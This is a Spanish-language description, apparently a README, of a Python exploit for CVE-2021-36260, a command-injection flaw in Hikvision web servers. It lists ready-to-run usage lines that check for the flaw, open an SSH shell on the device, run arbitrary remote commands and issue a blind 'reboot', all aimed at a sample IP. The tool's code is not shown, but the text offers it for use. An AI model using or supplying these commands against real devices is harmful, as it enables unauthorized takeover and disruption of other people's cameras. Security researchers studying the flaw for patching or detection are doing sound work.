
Exploit en Python para la inyección de comandos CVE-2021-36260 en servidores web de Hikvision. Admite verificación de vulnerabilidades segura/insegura, ejecución remota de comandos y acceso a shell SSH en dispositivos IoT.
CVE-2021-36260 POC de vulnerabilidad de inyección de comandos en el servidor web de algunos productos Hikvision. Debido a una validación insuficiente de entrada, un atacante puede explotar la vulnerabilidad para lanzar un ataque de inyección de comandos enviando mensajes con comandos maliciosos.
Título del exploit: Hikvision Web Server Build 210702 - Inyección de comandos
Autor del exploit: bashis -- errores actualizados por shubtheone
Página del proveedor: https://www.hikvision.com/
Versión: 1.0
CVE: CVE-2021-36260
Referencia: https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html
Nota:
[Ejemplos] Verificación segura de vulnerabilidad/verificación: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check
Verificación de vulnerabilidad segura y no segura: (solo usará 'unsafe check' si no se verifica con 'safe check') $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check --reboot
Verificación no segura de vulnerabilidad/verificación: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --reboot
Iniciar y conectar a shell SSH: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --shell
Ejecutar comando: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd "ls -l"
Ejecutar comando ciego: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd_blind "reboot"